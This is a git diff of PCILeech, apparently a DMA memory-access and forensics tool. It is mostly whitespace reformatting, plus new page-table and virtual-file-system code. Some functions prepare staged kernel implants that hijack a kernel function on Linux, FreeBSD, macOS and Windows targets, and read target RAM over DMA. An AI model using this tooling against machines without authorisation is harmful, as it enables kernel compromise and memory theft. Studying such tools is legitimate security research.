-	_In_ DWORD paSzKallsyms, _In_ QWORD vaSzKallsyms, _In_ QWORD vaFnKallsyms, 
-	_In_ DWORD paSzFnHijack, _In_ QWORD vaSzFnHijack, _In_ QWORD vaFnHijack, _Out_ PSIGNATURE pSignature)
+    _In_ DWORD paSzKallsyms, _In_ QWORD vaSzKallsyms, _In_ QWORD vaFnKallsyms,
+    _In_ DWORD paSzFnHijack, _In_ QWORD vaSzFnHijack, _In_ QWORD vaFnHijack, _Out_ PSIGNATURE pSignature)
 {
-	DWORD dwBaseKallsyms2M = (paSzKallsyms & ~0x1fffff) - ((vaSzKallsyms & ~0x1fffff) - (vaFnKallsyms & ~0x1fffff));	// symbol name base is not same as fn base
-	DWORD dwBaseFnHijack2M = (paSzFnHijack & ~0x1fffff) - ((vaSzFnHijack & ~0x1fffff) - (vaFnHijack & ~0x1fffff));		// symbol name base is not same as fn base
-	memset(pSignature, 0, sizeof(SIGNATURE));
-	Util_ParseHexFileBuiltin("DEFAULT_LINUX_X64_STAGE1", pSignature->chunk[2].pb, 4096, &pSignature->chunk[2].cb);
-	Util_ParseHexFileBuiltin("DEFAULT_LINUX_X64_STAGE2", pSignature->chunk[3].pb, 4096, &pSignature->chunk[3].cb);
-	Util_ParseHexFileBuiltin("DEFAULT_LINUX_X64_STAGE3", pSignature->chunk[4].pb, 4096, &pSignature->chunk[4].cb);
-	pSignature->chunk[2].cbOffset = (DWORD)(dwBaseFnHijack2M + (vaFnHijack & 0x1fffff));
-	pSignature->chunk[3].cbOffset = 0xd00;
-	pSignature->chunk[4].cbOffset = (DWORD)(dwBaseKallsyms2M + (vaFnKallsyms & 0x1fffff));
-	pSignature->chunk[0].qwAddress = paBase + dwBaseFnHijack2M + (vaFnHijack & 0x1ff000);
-	pSignature->chunk[1].qwAddress = paBase;
+    DWORD dwBaseKallsyms2M = (paSzKallsyms & ~0x1fffff) - ((vaSzKallsyms & ~0x1fffff) - (vaFnKallsyms & ~0x1fffff));    // symbol name base is not same as fn base
+    DWORD dwBaseFnHijack2M = (paSzFnHijack & ~0x1fffff) - ((vaSzFnHijack & ~0x1fffff) - (vaFnHijack & ~0x1fffff));      // symbol name base is not same as fn base
+    memset(pSignature, 0, sizeof(SIGNATURE));
+    Util_ParseHexFileBuiltin("DEFAULT_LINUX_X64_STAGE1", pSignature->chunk[2].pb, 4096, &pSignature->chunk[2].cb);
+    Util_ParseHexFileBuiltin("DEFAULT_LINUX_X64_STAGE2", pSignature->chunk[3].pb, 4096, &pSignature->chunk[3].cb);
+    Util_ParseHexFileBuiltin("DEFAULT_LINUX_X64_STAGE3", pSignature->chunk[4].pb, 4096, &pSignature->chunk[4].cb);
+    pSignature->chunk[2].cbOffset = (DWORD)(dwBaseFnHijack2M + (vaFnHijack & 0x1fffff));
+    pSignature->chunk[3].cbOffset = 0xd00;
+    pSignature->chunk[4].cbOffset = (DWORD)(dwBaseKallsyms2M + (vaFnKallsyms & 0x1fffff));
+    pSignature->chunk[0].qwAddress = paBase + dwBaseFnHijack2M + (vaFnHijack & 0x1ff000);
+    pSignature->chunk[1].qwAddress = paBase;
 }
 
 VOID Util_CreateSignatureFreeBSDGeneric(_In_ DWORD paStrTab, _In_ DWORD paFnHijack, _Out_ PSIGNATURE pSignature)
 {
-	memset(pSignature, 0, sizeof(SIGNATURE));
-	Util_ParseHexFileBuiltin("DEFAULT_FREEBSD_X64_STAGE1", pSignature->chunk[2].pb, 4096, &pSignature->chunk[2].cb);
-	Util_ParseHexFileBuiltin("DEFAULT_FREEBSD_X64_STAGE2", pSignature->chunk[3].pb, 4096, &pSignature->chunk[3].cb);
-	Util_ParseHexFileBuiltin("DEFAULT_FREEBSD_X64_STAGE3", pSignature->chunk[4].pb, 4096, &pSignature->chunk[4].cb);
-	pSignature->chunk[0].cbOffset = paFnHijack;
-	pSignature->chunk[1].cbOffset = 0x1e00;
-	pSignature->chunk[2].cbOffset = paFnHijack;
-	pSignature->chunk[3].cbOffset = 0x1e00;
-	pSignature->chunk[4].cbOffset = paStrTab;
-	pSignature->chunk[0].qwAddress = pSignature->chunk[0].cbOffset & ~0xfff;
-	pSignature->chunk[1].qwAddress = pSignature->chunk[1].cbOffset & ~0xfff;
+    memset(pSignature, 0, sizeof(SIGNATURE));
+    Util_ParseHexFileBuiltin("DEFAULT_FREEBSD_X64_STAGE1", pSignature->chunk[2].pb, 4096, &pSignature->chunk[2].cb);
+    Util_ParseHexFileBuiltin("DEFAULT_FREEBSD_X64_STAGE2", pSignature->chunk[3].pb, 4096, &pSignature->chunk[3].cb);
+    Util_ParseHexFileBuiltin("DEFAULT_FREEBSD_X64_STAGE3", pSignature->chunk[4].pb, 4096, &pSignature->chunk[4].cb);
+    pSignature->chunk[0].cbOffset = paFnHijack;
+    pSignature->chunk[1].cbOffset = 0x1e00;
+    pSignature->chunk[2].cbOffset = paFnHijack;
+    pSignature->chunk[3].cbOffset = 0x1e00;
+    pSignature->chunk[4].cbOffset = paStrTab;
+    pSignature->chunk[0].qwAddress = pSignature->chunk[0].cbOffset & ~0xfff;
+    pSignature->chunk[1].qwAddress = pSignature->chunk[1].cbOffset & ~0xfff;
 }
 
 VOID Util_CreateSignatureMacOSGeneric(_In_ DWORD paKernelBase, _In_ DWORD paFunctionHook, _In_ DWORD paStage2, _Out_ PSIGNATURE pSignature)
 {
-	memset(pSignature, 0, sizeof(SIGNATURE));
-	Util_ParseHexFileBuiltin("DEFAULT_MACOS_STAGE1", pSignature->chunk[2].pb, 4096, &pSignature->chunk[2].cb);
-	Util_ParseHexFileBuiltin("DEFAULT_MACOS_STAGE2", pSignature->chunk[3].pb, 4096, &pSignature->chunk[3].cb);
-	Util_ParseHexFileBuiltin("DEFAULT_MACOS_STAGE3", pSignature->chunk[4].pb, 4096, &pSignature->chunk[4].cb);
-	pSignature->chunk[0].cbOffset = paFunctionHook;
-	pSignature->chunk[1].cbOffset = paStage2;
-	pSignature->chunk[2].cbOffset = paFunctionHook;
-	pSignature->chunk[3].cbOffset = paStage2;
-	pSignature->chunk[4].cbOffset = paKernelBase;
-	pSignature->chunk[0].qwAddress = pSignature->chunk[0].cbOffset & ~0xfff;
-	pSignature->chunk[1].qwAddress = pSignature->chunk[1].cbOffset & ~0xfff;
+    memset(pSignature, 0, sizeof(SIGNATURE));
+    Util_ParseHexFileBuiltin("DEFAULT_MACOS_STAGE1", pSignature->chunk[2].pb, 4096, &pSignature->chunk[2].cb);
+    Util_ParseHexFileBuiltin("DEFAULT_MACOS_STAGE2", pSignature->chunk[3].pb, 4096, &pSignature->chunk[3].cb);
+    Util_ParseHexFileBuiltin("DEFAULT_MACOS_STAGE3", pSignature->chunk[4].pb, 4096, &pSignature->chunk[4].cb);
+    pSignature->chunk[0].cbOffset = paFunctionHook;
+    pSignature->chunk[1].cbOffset = paStage2;
+    pSignature->chunk[2].cbOffset = paFunctionHook;
+    pSignature->chunk[3].cbOffset = paStage2;
+    pSignature->chunk[4].cbOffset = paKernelBase;
+    pSignature->chunk[0].qwAddress = pSignature->chunk[0].cbOffset & ~0xfff;
+    pSignature->chunk[1].qwAddress = pSignature->chunk[1].cbOffset & ~0xfff;
 }
 
 VOID Util_CreateSignatureWindowsHalGeneric(_Out_ PSIGNATURE pSignature)
 {
-	memset(pSignature, 0, sizeof(SIGNATURE));
-	Util_ParseHexFileBuiltin("DEFAULT_WINX64_STAGE2_HAL", pSignature->chunk[3].pb, 4096, &pSignature->chunk[3].cb);
-	Util_ParseHexFileBuiltin("DEFAULT_WINX64_STAGE3", pSignature->chunk[4].pb, 4096, &pSignature->chunk[4].cb);
+    memset(pSignature, 0, sizeof(SIGNATURE));
+    Util_ParseHexFileBuiltin("DEFAULT_WINX64_STAGE2_HAL", pSignature->chunk[3].pb, 4096, &pSignature->chunk[3].cb);
+    Util_ParseHexFileBuiltin("DEFAULT_WINX64_STAGE3", pSignature->chunk[4].pb, 4096, &pSignature->chunk[4].cb);
 }
 
 VOID Util_CreateSignatureLinuxEfiRuntimeServices(_Out_ PSIGNATURE pSignature)
 {
-	memset(pSignature, 0, sizeof(SIGNATURE));
-	Util_ParseHexFileBuiltin("DEFAULT_LINUX_X64_STAGE2_EFI", pSignature->chunk[3].pb, 4096, &pSignature->chunk[3].cb);
-	Util_ParseHexFileBuiltin("DEFAULT_LINUX_X64_STAGE3", pSignature->chunk[4].pb, 4096, &pSignature->chunk[4].cb);
+    memset(pSignature, 0, sizeof(SIGNATURE));
+    Util_ParseHexFileBuiltin("DEFAULT_LINUX_X64_STAGE2_EFI", pSignature->chunk[3].pb, 4096, &pSignature->chunk[3].cb);
+    Util_ParseHexFileBuiltin("DEFAULT_LINUX_X64_STAGE3", pSignature->chunk[4].pb, 4096, &pSignature->chunk[4].cb);
 }
 
 VOID Util_CreateSignatureSearchAll(_In_ PBYTE pb, _In_ DWORD cb, _Out_ PSIGNATURE pSignature)
 {
-	memset(pSignature, 0, sizeof(SIGNATURE));
-	pSignature->chunk[0].tpOffset = SIGNATURE_CHUNK_TP_OFFSET_ANY;
-	pSignature->chunk[0].cb = cb < 0x1000 ? cb : 0x1000;
-	pSignature->chunk[2].tpOffset = SIGNATURE_CHUNK_TP_OFFSET_RELATIVE;
-	memcpy(pSignature->chunk[0].pb, pb, pSignature->chunk[0].cb);
+    memset(pSignature, 0, sizeof(SIGNATURE));
+    pSignature->chunk[0].tpOffset = SIGNATURE_CHUNK_TP_OFFSET_ANY;
+    pSignature->chunk[0].cb = cb < 0x1000 ? cb : 0x1000;
+    pSignature->chunk[2].tpOffset = SIGNATURE_CHUNK_TP_OFFSET_RELATIVE;
+    memcpy(pSignature->chunk[0].pb, pb, pSignature->chunk[0].cb);
 }
 
 VOID Util_Read1M(_Inout_ PPCILEECH_CONTEXT ctx, _Out_ PBYTE pbBuffer1M, _In_ QWORD qwBaseAddress, _Inout_opt_ PPAGE_STATISTICS pPageStat)
 {
-	QWORD o, p;
-	// try read 1M in 128k chunks
-	for(o = 0; o < 0x00100000; o += 0x00020000) {
-		if((qwBaseAddress + o + 0x00020000 <= ctx->cfg->qwAddrMax) && DeviceReadMEM(ctx, qwBaseAddress + o, pbBuffer1M + o, 0x00020000, 0)) {
-			PageStatUpdate(pPageStat, qwBaseAddress + o + 0x00020000, 32, 0);
-		} else {
-			// try read 128k in 4k (page) chunks
-			for(p = 0; p < 0x00020000; p += 0x1000) {
-				if(!(qwBaseAddress + o + p + 0x1000 <= ctx->cfg->qwAddrMax)) {
-					return;
-				}
-				if((qwBaseAddress + o + p + 0x1000 <= ctx->cfg->qwAddrMax) && DeviceReadMEM(ctx, qwBaseAddress + o + p, pbBuffer1M + o + p, 0x1000, 0)) {
-					PageStatUpdate(pPageStat, qwBaseAddress + o + p + 0x1000, 1, 0);
-				} else {
-					PageStatUpdate(pPageStat, qwBaseAddress + o + p + 0x1000, 0, 1);
-				}
-			}
-		}
-	}
+    QWORD o, p;
+    // try read 1M in 128k chunks
+    for(o = 0; o < 0x00100000; o += 0x00020000) {
+        if((qwBaseAddress + o + 0x00020000 <= ctx->cfg->qwAddrMax) && DeviceReadMEM(ctx, qwBaseAddress + o, pbBuffer1M + o, 0x00020000, 0)) {
+            PageStatUpdate(pPageStat, qwBaseAddress + o + 0x00020000, 32, 0);
+        } else {
+            // try read 128k in 4k (page) chunks
+            for(p = 0; p < 0x00020000; p += 0x1000) {
+                if(!(qwBaseAddress + o + p + 0x1000 <= ctx->cfg->qwAddrMax)) {
+                    return;
+                }
+                if((qwBaseAddress + o + p + 0x1000 <= ctx->cfg->qwAddrMax) && DeviceReadMEM(ctx, qwBaseAddress + o + p, pbBuffer1M + o + p, 0x1000, 0)) {
+                    PageStatUpdate(pPageStat, qwBaseAddress + o + p + 0x1000, 1, 0);
+                } else {
+                    PageStatUpdate(pPageStat, qwBaseAddress + o + p + 0x1000, 0, 1);
+                }
+            }
+        }
+    }
 }
 
 BOOL Util_Read16M(_Inout_ PPCILEECH_CONTEXT ctx, _Out_ PBYTE pbBuffer16M, _In_ QWORD qwBaseAddress, _Inout_opt_ PPAGE_STATISTICS pPageStat)
 {
-	BOOL isSuccess[4] = { FALSE, FALSE, FALSE, FALSE };
-	QWORD i, o, qwOffset, cbRead;
-	if(qwBaseAddress >= ctx->cfg->qwAddrMax) { return FALSE; }
-	if(!ctx->phKMD) { // Native DMA
-		cbRead = min(0x01000000, ctx->cfg->qwAddrMax - qwBaseAddress);
-		return 0 != DeviceReadDMAEx(ctx, qwBaseAddress, pbBuffer16M, (DWORD)cbRead, pPageStat, 0);
-	}
-	// try read 16M
-	if((qwBaseAddress + 0x01000000 <= ctx->cfg->qwAddrMax) && DeviceReadMEM(ctx, qwBaseAddress, pbBuffer16M, 0x01000000, 0)) {
-		PageStatUpdate(pPageStat, qwBaseAddress + 0x010000000, 4096, 0);
-		return TRUE;
-	}
-	// try read 16M in 4M chunks
-	memset(pbBuffer16M, 0, 0x01000000);
-	for(i = 0; i < 4; i++) {
-		o = 0x00400000 * i;
-		isSuccess[i] = (qwBaseAddress + o + 0x00400000 <= ctx->cfg->qwAddrMax) && DeviceReadMEM(ctx, qwBaseAddress + o, pbBuffer16M + o, 0x00400000, 0);
-	}
-	// try read failed chunks.
-	for(i = 0; i < 4; i++) {
-		if(isSuccess[i]) {
-			PageStatUpdate(pPageStat, qwBaseAddress + (i + 1) * 0x00400000, 1024, 0);
-		} else { 
-			qwOffset = 0x00400000 * i;
-			for(o = 0; o < 0x00400000; o += 0x00100000) {
-				Util_Read1M(ctx, pbBuffer16M + qwOffset + o, qwBaseAddress + qwOffset + o, pPageStat);
-			}
-		}
-	}
-	return TRUE;
+    BOOL isSuccess[4] = { FALSE, FALSE, FALSE, FALSE };
+    QWORD i, o, qwOffset, cbRead;
+    if(qwBaseAddress >= ctx->cfg->qwAddrMax) { return FALSE; }
+    if(!ctx->phKMD) { // Native DMA
+        cbRead = min(0x01000000, ctx->cfg->qwAddrMax - qwBaseAddress);
+        return 0 != DeviceReadDMAEx(ctx, qwBaseAddress, pbBuffer16M, (DWORD)cbRead, pPageStat, 0);
+    }
+    // try read 16M
+    if((qwBaseAddress + 0x01000000 <= ctx->cfg->qwAddrMax) && DeviceReadMEM(ctx, qwBaseAddress, pbBuffer16M, 0x01000000, 0)) {
+        PageStatUpdate(pPageStat, qwBaseAddress + 0x010000000, 4096, 0);
+        return TRUE;
+    }
+    // try read 16M in 4M chunks
+    memset(pbBuffer16M, 0, 0x01000000);
+    for(i = 0; i < 4; i++) {
+        o = 0x00400000 * i;
+        isSuccess[i] = (qwBaseAddress + o + 0x00400000 <= ctx->cfg->qwAddrMax) && DeviceReadMEM(ctx, qwBaseAddress + o, pbBuffer16M + o, 0x00400000, 0);
+    }
+    // try read failed chunks.
+    for(i = 0; i < 4; i++) {
+        if(isSuccess[i]) {
+            PageStatUpdate(pPageStat, qwBaseAddress + (i + 1) * 0x00400000, 1024, 0);
+        } else {
+            qwOffset = 0x00400000 * i;
+            for(o = 0; o < 0x00400000; o += 0x00100000) {
+                Util_Read1M(ctx, pbBuffer16M + qwOffset + o, qwBaseAddress + qwOffset + o, pPageStat);
+            }
+        }
+    }
+    return TRUE;
 }
 
 VOID Util_WaitForPowerOn(_Inout_ PPCILEECH_CONTEXT ctx)
 {
-	BYTE pbDummy[4096];
-	while(TRUE) {
-		if(DeviceOpen(ctx)) {
-			if(DeviceReadDMA(ctx, 0x01000000, pbDummy, 0x1000, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
-				break;
-			}
-			DeviceClose(ctx);
-		}
-		Sleep(100);
-	}
+    BYTE pbDummy[4096];
+    while(TRUE) {
+        if(DeviceOpen(ctx)) {
+            if(DeviceReadDMA(ctx, 0x01000000, pbDummy, 0x1000, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
+                break;
+            }
+            DeviceClose(ctx);
+        }
+        Sleep(100);
+    }
 }
 
 VOID Util_WaitForPowerCycle(_Inout_ PPCILEECH_CONTEXT ctx)
 {
-	DeviceClose(ctx);
-	while(DeviceOpen(ctx)) {
-		DeviceClose(ctx);
-		Sleep(100);
-	}
-	Util_WaitForPowerOn(ctx);
+    DeviceClose(ctx);
+    while(DeviceOpen(ctx)) {
+        DeviceClose(ctx);
+        Sleep(100);
+    }
+    Util_WaitForPowerOn(ctx);
 }
 
 VOID Util_PrintHexAscii(_In_ PBYTE pb, _In_ DWORD cb, _In_ DWORD cbInitialOffset)
 {
-	DWORD i, j;
-	if(cb > 0x10000) {
-		printf("Large output. Only displaying first 65kB.\n");
-		cb = 0x10000 - cbInitialOffset;
-	}
-	cb += cbInitialOffset;
-	for(i = cbInitialOffset; i < cb + ((cb % 16) ? (16 - cb % 16) : 0); i++)
-	{
-		// address
-		if(0 == i % 16) {
-			printf("%04x    ", i % 0x10000);
-		} else if(0 == i % 8) {
-			putchar(' ');
-		}
-		// hex
-		if(i < cb) {
-			printf("%02x ", pb[i]);
-		} else {
-			printf("   ");
-		}
-		// ascii
-		if(15 == i % 16) {
-			printf("  ");
-			for(j = i - 15; j <= i; j++) {
-				if(j >= cb) {
-					putchar(' ');
-				} else {
-					putchar(isprint(pb[j]) ? pb[j] : '.');
-				}
-			}
-			putchar('\n');
-		}
-	}
+    DWORD i, j;
+    if(cb > 0x10000) {
+        printf("Large output. Only displaying first 65kB.\n");
+        cb = 0x10000 - cbInitialOffset;
+    }
+    cb += cbInitialOffset;
+    for(i = cbInitialOffset; i < cb + ((cb % 16) ? (16 - cb % 16) : 0); i++)
+    {
+        // address
+        if(0 == i % 16) {
+            printf("%04x    ", i % 0x10000);
+        } else if(0 == i % 8) {
+            putchar(' ');
+        }
+        // hex
+        if(i < cb) {
+            printf("%02x ", pb[i]);
+        } else {
+            printf("   ");
+        }
+        // ascii
+        if(15 == i % 16) {
+            printf("  ");
+            for(j = i - 15; j <= i; j++) {
+                if(j >= cb) {
+                    putchar(' ');
+                } else {
+                    putchar(isprint(pb[j]) ? pb[j] : '.');
+                }
+            }
+            putchar('\n');
+        }
+    }
 }
diff --git a/pcileech/util.h b/pcileech/util.h
index 24acc29..fd830ab 100644
--- a/pcileech/util.h
+++ b/pcileech/util.h
@@ -1,6 +1,6 @@
 // util.h : definitions of various utility functions.
 //
-// (c) Ulf Frisk, 2016, 2017
+// (c) Ulf Frisk, 2016-2018
 // Author: Ulf Frisk, pcileech@frizk.net
 //
 #ifndef __UTIL_H__
@@ -57,6 +57,18 @@ BOOL Util_PageTable_FindSignatureBase(_Inout_ PPCILEECH_CONTEXT ctx, _Inout_ PQW
 */
 BOOL Util_PageTable_FindMappedAddress(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwCR3, _In_ QWORD qwAddrPhys, _Out_ PQWORD pqwAddrVirt, _Out_opt_ PQWORD pqwPTE, _Out_opt_ PQWORD pqwPDE, _Out_opt_ PQWORD pqwPDPTE, _Out_opt_ PQWORD pqwPML4E);
 
+/*
+* Walk the page table to translate a virtual address into a physical.
+* -- ctx
+* -- qwCR3 = the physical address of PML4.
+* -- qwVA = the virtual address.
+* -- pqwPA = ptr to receive physical address.
+* -- pqwPageBase = ptr to receive the page base of the physical address.
+* -- pqwPageSize = ptr to receive size of physical page in bytes.
+* -- return
+*/
+BOOL Util_PageTable_Virtual2Physical(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwCR3, _In_ QWORD qwVA, _Out_ PQWORD pqwPA, _Out_ PQWORD pqwPageBase, _Out_ PQWORD pqwPageSize);
+
 /*
 * Load KMD and Unlock signatures.
 * -- szSignatureName
@@ -144,8 +156,8 @@ QWORD Util_GetNumeric(_In_ LPSTR sz);
 * -- pSignature = ptr to signature struct to place the result in.
 */
 VOID Util_CreateSignatureLinuxGeneric(_In_ QWORD paBase,
-	_In_ DWORD paSzKallsyms, _In_ QWORD vaSzKallsyms, _In_ QWORD vaFnKallsyms,
-	_In_ DWORD paSzFnHijack, _In_ QWORD vaSzFnHijack, _In_ QWORD vaFnHijack, _Out_ PSIGNATURE pSignature);
+    _In_ DWORD paSzKallsyms, _In_ QWORD vaSzKallsyms, _In_ QWORD vaFnKallsyms,
+    _In_ DWORD paSzFnHijack, _In_ QWORD vaSzFnHijack, _In_ QWORD vaFnHijack, _Out_ PSIGNATURE pSignature);
 /*
 * "Create" a static signature for FreeBSD given the supplied parameters. The
 * function formats the paramerters and put them into the supplied pSignature.
diff --git a/pcileech/vfs.c b/pcileech/vfs.c
index 0aa5a4b..9f9182c 100644
--- a/pcileech/vfs.c
+++ b/pcileech/vfs.c
@@ -1,6 +1,6 @@
 // vfs.c : implementation of functions related to virtual file system support.
 //
-// (c) Ulf Frisk, 2017
+// (c) Ulf Frisk, 2017-2018
 // Author: Ulf Frisk, pcileech@frizk.net
 //
 #ifdef WIN32
@@ -13,118 +13,106 @@
 #pragma warning( disable : 4005 )   
 #include "dokan.h"
 #pragma warning( pop )
+#include "vmmvfs.h"
+#include "vmmproc.h"
 
 //-------------------------------------------------------------------------------
 // Defines and Typedefs (shared with shellcode) below:
 //-------------------------------------------------------------------------------
 
-#define VFS_OP_MAGIC				0x79e720ad93aa130f
-#define VFS_OP_CMD_LIST_DIRECTORY	1
-#define VFS_OP_CMD_WRITE			2
-#define VFS_OP_CMD_READ				3
-#define VFS_OP_CMD_CREATE			4
-#define VFS_OP_CMD_DELETE			5
-
-#define VFS_FLAGS_FILE_NORMAL		0x01
-#define VFS_FLAGS_FILE_DIRECTORY	0x02
-#define VFS_FLAGS_FILE_SYMLINK		0x04
-#define VFS_FLAGS_FILE_OTHER		0x08
-#define VFS_FLAGS_UNICODE			0x10
-#define VFS_FLAGS_EXIST_FILE		0x20
-#define VFS_FLAGS_TRUNCATE_ON_WRITE	0x40
-#define VFS_FLAGS_APPEND_ON_WRITE	0x80
+#define VFS_OP_MAGIC                    0x79e720ad93aa130f
+#define VFS_OP_CMD_LIST_DIRECTORY       1
+#define VFS_OP_CMD_WRITE                2
+#define VFS_OP_CMD_READ                 3
+#define VFS_OP_CMD_CREATE               4
+#define VFS_OP_CMD_DELETE               5
 
 typedef struct tdVFS_OPERATION {
-	QWORD magic;
-	QWORD op;
-	QWORD flags;
-	CHAR szFileName[MAX_PATH];
-	WCHAR wszFileName[MAX_PATH];
-	QWORD offset;
-	QWORD cb;
-	BYTE pb[];
+    QWORD magic;
+    QWORD op;
+    QWORD flags;
+    CHAR szFileName[MAX_PATH];
+    WCHAR wszFileName[MAX_PATH];
+    QWORD offset;
+    QWORD cb;
+    BYTE pb[];
 } VFS_OPERATION, *PVFS_OPERATION;
 
-typedef struct tdVFS_RESULT_FILEINFO {
-	QWORD flags;
-	QWORD tAccessOpt;
-	QWORD tModifyOpt;
-	QWORD tCreateOpt;
-	QWORD dbg1;
-	QWORD dbg2;
-	QWORD cb;
-	WCHAR wszFileName[MAX_PATH];
-} VFS_RESULT_FILEINFO, *PVFS_RESULT_FILEINFO;
-
 //-------------------------------------------------------------------------------
 // Defines and Typedefs (not shared with shellcode) below:
 //-------------------------------------------------------------------------------
 
-#define CACHE_MEM_ENTRIES			32
-#define CACHE_MEM_SIZE				0x00400000
-#define CACHE_MEM_LIFETIME_MS		2000
-#define CACHE_FILE_ENTRIES			32
-#define CACHE_FILE_SIZE				0x00200000
-#define CACHE_FILE_LIFETIME_MS		10000
-#define CACHE_DIRECTORY_ENTRIES		32
-#define CACHE_DIRECTORY_LIFETIME_MS	10000
+#define VFS_RAM_TP_KMD                  0
+#define VFS_RAM_TP_NATIVE               1
+#define VFS_RAM_TP_MAX                  1
+
+#define CACHE_MEM_ENTRIES               32
+#define CACHE_MEM_SIZE                  0x00400000
+#define CACHE_MEM_LIFETIME_MS           2000
+#define CACHE_FILE_ENTRIES              32
+#define CACHE_FILE_SIZE                 0x00200000
+#define CACHE_FILE_LIFETIME_MS          10000
+#define CACHE_DIRECTORY_ENTRIES         32
+#define CACHE_DIRECTORY_LIFETIME_MS     5000
 
 typedef struct tdVfsCacheMem {
-	QWORD qwTickCount64;
-	QWORD qwA;
-	BYTE pb[CACHE_MEM_SIZE];
+    QWORD qwTickCount64;
+    QWORD qwA;
+    BYTE pb[CACHE_MEM_SIZE];
 } VFS_CACHE_MEM, *PVFS_CACHE_MEM;
 
 typedef struct tdVfsCacheFile {
-	QWORD qwTickCount64;
-	WCHAR wszFileName[MAX_PATH];
-	QWORD cbOffset;
-	QWORD cb;
-	BYTE pb[CACHE_FILE_SIZE];
+    QWORD qwTickCount64;
+    WCHAR wszFileName[MAX_PATH];
+    QWORD cbOffset;
+    QWORD cb;
+    BYTE pb[CACHE_FILE_SIZE];
 } VFS_CACHE_FILE, *PVFS_CACHE_FILE;
 
 typedef struct tdVfsCacheDirectory {
-	QWORD qwTickCount64;
-	WCHAR wszDirectoryName[MAX_PATH];
-	QWORD cfi;
-	PVFS_RESULT_FILEINFO pfi;
+    QWORD qwTickCount64;
+    WCHAR wszDirectoryName[MAX_PATH];
+    QWORD cfi;
+    PVFS_RESULT_FILEINFO pfi;
 } VFS_CACHE_DIRECTORY, *PVFS_CACHE_DIRECTORY;
 
 typedef struct tdVFS_STAT_ELEM {
-	QWORD hit;
-	QWORD miss;
+    QWORD hit;
+    QWORD miss;
 } VFS_STAT_ELEM;
 
 typedef struct tdVFS_STATISTICS {
-	VFS_STAT_ELEM cRAM;
-	VFS_STAT_ELEM cbRAM;
-	VFS_STAT_ELEM cLISTDIR;
-	VFS_STAT_ELEM cLISTFILE;
-	VFS_STAT_ELEM cFILE;
-	VFS_STAT_ELEM cbFILE;
-	BOOL fThreadExit;
-	HANDLE hThread;
-	HANDLE hConsole;
-	WORD wConsoleCursorPosition;
+    VFS_STAT_ELEM cRAM;
+    VFS_STAT_ELEM cbRAM;
+    VFS_STAT_ELEM cLISTDIR;
+    VFS_STAT_ELEM cLISTFILE;
+    VFS_STAT_ELEM cFILE;
+    VFS_STAT_ELEM cbFILE;
+    BOOL fThreadExit;
+    HANDLE hThread;
+    HANDLE hConsole;
+    WORD wConsoleCursorPosition;
 } VFS_STATISTICS, *PVFS_STATISTICS;
 
 typedef struct tdVFS_GLOBAL_STATE {
-	SYSTEMTIME time;
-	PPCILEECH_CONTEXT ctx;
-	QWORD cbRAM;
-	VFS_STATISTICS Statistics;
-	CRITICAL_SECTION LockDma;
-	CRITICAL_SECTION LockCache;
-	NTSTATUS(*DokanNtStatusFromWin32)(DWORD Error);
-	QWORD PCILeechOperatingSystem;
-	CHAR szNameVfsShellcode[32];
-	BYTE pbDMA16M[0x01000000];
-	QWORD CacheMemIndex;
-	VFS_CACHE_MEM CacheMem[CACHE_MEM_ENTRIES];
-	QWORD CacheFileIndex;
-	VFS_CACHE_FILE CacheFile[CACHE_FILE_ENTRIES];
-	QWORD CacheDirectoryIndex;
-	VFS_CACHE_DIRECTORY CacheDirectory[CACHE_DIRECTORY_ENTRIES];
+    SYSTEMTIME time;
+    PPCILEECH_CONTEXT ctx;
+    QWORD cbRAM[VFS_RAM_TP_MAX+1];
+    VFS_STATISTICS Statistics;
+    CRITICAL_SECTION LockDma;
+    CRITICAL_SECTION LockCache;
+    NTSTATUS(*DokanNtStatusFromWin32)(DWORD Error);
+    QWORD PCILeechOperatingSystem;
+    CHAR szNameVfsShellcode[32];
+    BYTE pbDMA16M[0x01000000];
+    QWORD CacheMemIndex;
+    VFS_CACHE_MEM CacheMem[VFS_RAM_TP_MAX+1][CACHE_MEM_ENTRIES];
+    QWORD CacheFileIndex;
+    VFS_CACHE_FILE CacheFile[CACHE_FILE_ENTRIES];
+    QWORD CacheDirectoryIndex;
+    VFS_CACHE_DIRECTORY CacheDirectory[CACHE_DIRECTORY_ENTRIES];
+    BOOL fKMD;
+    BOOL fVMM;
 } VFS_GLOBAL_STATE, *PVFS_GLOBAL_STATE;
 
 VOID Vfs_UtilSplitPathFile(_Out_ WCHAR wszPath[MAX_PATH], _Out_ LPWSTR *pwcsFile, _In_ LPCWSTR wcsFileName);
@@ -136,205 +124,205 @@ VOID Vfs_UtilSplitPathFile(_Out_ WCHAR wszPath[MAX_PATH], _Out_ LPWSTR *pwcsFile
 
 BOOL VfsCache_DirectoryGetSingle(_Out_ PVFS_RESULT_FILEINFO pfi, _Out_ PBOOL isExisting, _In_ LPCWSTR wcsPath, _In_ LPCWSTR wcsFile, _In_ PVFS_GLOBAL_STATE pds)
 {
-	QWORD i, j, qwCurrentTickCount;
-	qwCurrentTickCount = GetTickCount64();
-	EnterCriticalSection(&pds->LockCache);
-	for(i = 0; i < CACHE_DIRECTORY_ENTRIES; i++) {
-		if(wcscmp(wcsPath, pds->CacheDirectory[i].wszDirectoryName)) {
-			continue;
-		}
-		if(qwCurrentTickCount - pds->CacheDirectory[i].qwTickCount64 > CACHE_DIRECTORY_LIFETIME_MS) {
-			continue;
-		}
-		for(j = 0; j < pds->CacheDirectory[i].cfi; j++) {
-			if(!wcscmp(wcsFile, pds->CacheDirectory[i].pfi[j].wszFileName)) {
-				memcpy(pfi, &pds->CacheDirectory[i].pfi[j], sizeof(VFS_RESULT_FILEINFO));
-				LeaveCriticalSection(&pds->LockCache);
-				*isExisting = TRUE;
-				pds->Statistics.cLISTFILE.hit++;
-				return TRUE;
-			}
-		}
-		LeaveCriticalSection(&pds->LockCache);
-		*isExisting = FALSE;
-		pds->Statistics.cLISTFILE.miss++;
-		return TRUE;
-	}
-	LeaveCriticalSection(&pds->LockCache);
-	pds->Statistics.cLISTFILE.miss++;
-	return FALSE;
+    QWORD i, j, qwCurrentTickCount;
+    qwCurrentTickCount = GetTickCount64();
+    EnterCriticalSection(&pds->LockCache);
+    for(i = 0; i < CACHE_DIRECTORY_ENTRIES; i++) {
+        if(wcscmp(wcsPath, pds->CacheDirectory[i].wszDirectoryName)) {
+            continue;
+        }
